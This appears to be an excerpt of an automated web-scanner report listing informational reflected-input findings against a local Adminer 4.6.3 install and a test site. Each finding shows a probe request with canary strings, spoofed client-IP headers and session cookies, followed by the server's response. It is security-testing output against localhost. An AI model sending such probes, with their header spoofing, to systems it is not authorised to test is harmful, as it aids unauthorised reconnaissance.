mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=gPsfQieMolq4x542tc&username=wWXwJEEF&db=AhfDADgK&', '85229:799636')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</
...[SNIP]...
<input name="auth[server]" value="gPsfQieMolq4x542tc" title="hostname[:port]" placeholder="localhost" autocapitalize="off">
...[SNIP]...
19.24. http://localhost/adminer/adminer-4.6.3.php [token parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the token request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=qfd3ckvk0mlk5hrpl41rj5kln4; adminer_key=67912841158106235c36bdcddfcda778; adminer_lang=bg

lang=bg&token=815669%3a5748778n6a4kyvfz

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=bg; expires=Sat, 17 Nov 2018 21:03:04 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=67912841158106235c36bdcddfcda778; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ZWVhZmFmMDEzMTQxMTNlNzZmMzcxM2RlOTQ4OWY5NTU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4609
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="bg" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>........ - Adminer</title>
<link rel="style
...[SNIP]...
<input type="hidden" name="token" value="815669:5748778n6a4kyvfz">
...[SNIP]...
19.25. http://localhost/adminer/adminer-4.6.3.php [username parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the username request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEFbtpwx07bk5&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=

lang=en&token=271469%3a613140

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:04:34 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:04:34 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:04:34 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTE1YWRlYjRiNGRmYTM0YjBmMTNkMTI0YTVlZTg0NzQ=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4504
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM - Adminer</title>
<link re
...[SNIP]...
YWRlYjRiNGRmYTM0YjBmMTNkMTI0YTVlZTg0NzQ=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEFbtpwx07bk5&db=AhfDADgK&', '815485:69124')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
<input name="auth[username]" id="username" value="wWXwJEEFbtpwx07bk5" autocapitalize="off">
...[SNIP]...
19.26. http://localhost/examplewebiste/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistexkkj62st6t/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 298
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistexkkj62st6t/ was not found on this server.</p>
<h
...[SNIP]...
19.27. http://localhost/examplewebiste/about [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/about

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/aboutqx0f3vqiqr HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/aboutqx0f3vqiqr was not found on this server.</p>
...[SNIP]...
19.28. http://localhost/examplewebiste/about [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/about

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste7mtjxg80u3/about HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste7mtjxg80u3/about was not found on this server.</p>
...[SNIP]...
19.29. http://localhost/examplewebiste/config [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/configkm9dio87id HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 304
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/configkm9dio87id was not found on this server.</p>
...[SNIP]...
19.30. http://localhost/examplewebiste/config [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistesp4xhxzjxm/config HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 304
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistesp4xhxzjxm/config was not found on this server.</p>
...[SNIP]...
19.31. http://localhost/examplewebiste/config/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteb5hn88941w/config/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteb5hn88941w/config/ was not found on this server.</p>
...[SNIP]...
19.32. http://localhost/examplewebiste/config/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/configgbbhyfllpz/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/configgbbhyfllpz/ was not found on this server.</p>
...[SNIP]...
19.33. http://localhost/examplewebiste/config/config.inc [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/config/config.incywfqlb16b6 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:20 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/config/config.incywfqlb16b6 was not found on this server.</p>
...[SNIP]...
19.34. http://localhost/examplewebiste/config/config.inc [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistes6hyhn917t/config/config.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistes6hyhn917t/config/config.inc was not found on this server.</p>
...[SNIP]...
19.35. http://localhost/examplewebiste/config/config.inc [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/configb39jjhw3ia/config.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/configb39jjhw3ia/config.inc was not found on this server.</p>
...[SNIP]...
19.36. http://localhost/examplewebiste/config/config.inc.php.bak [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc.php.bak

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/config/config.inc.php.bakbh3rresvnh HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/config/config.inc.php.bakbh3rresvnh was not found on this server.</p>
...[SNIP]...
19.37. http://localhost/examplewebiste/config/config.inc.php.bak [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc.php.bak

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste8zvlzrok4c/config/config.inc.php.bak HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste8zvlzrok4c/config/config.inc.php.bak was not found on this server.</p>
...[SNIP]...
19.38. http://localhost/examplewebiste/config/config.inc.php.bak [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc.php.bak

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/configjec8cwb5ml/config.inc.php.bak HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/configjec8cwb5ml/config.inc.php.bak was not found on this server.</p>
...[SNIP]...
19.39. http://localhost/examplewebiste/docs/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebister2l39pjp31/docs/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebister2l39pjp31/docs/ was not found on this server.</p>
...[SNIP]...
19.40. http://localhost/examplewebiste/docs/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/docswud7e3ln4n/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docswud7e3ln4n/ was not found on this server.</p>
...[SNIP]...
19.41. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/examplewebiste_v1.3.pdf

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/docs/examplewebiste_v1.3.pdf6a2b5njd0g HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:32 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docs/examplewebiste_v1.3.pdf6a2b5njd0g was not found on this server.</p>
...[SNIP]...
19.42. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/examplewebiste_v1.3.pdf

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteod2pbgax2a/docs/examplewebiste_v1.3.pdf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteod2pbgax2a/docs/examplewebiste_v1.3.pdf was not found on this server.</p>
...[SNIP]...
19.43. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/examplewebiste_v1.3.pdf

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/docsunps8rmomf/examplewebiste_v1.3.pdf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docsunps8rmomf/examplewebiste_v1.3.pdf was not found on this server.</p>
...[SNIP]...
19.44. http://localhost/examplewebiste/docs/pdf [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/docs/pdfg8mqwwdpwn HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:20 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docs/pdfg8mqwwdpwn was not found on this server.</p>
...[SNIP]...
19.45. http://localhost/examplewebiste/docs/pdf [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistesenpnwb9eg/docs/pdf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistesenpnwb9eg/docs/pdf was not found on this server.</p>
...[SNIP]...
19.46. http://localhost/examplewebiste/docs/pdf [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/docsblgcx7riv0/pdf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docsblgcx7riv0/pdf was not found on this server.</p>
...[SNIP]...
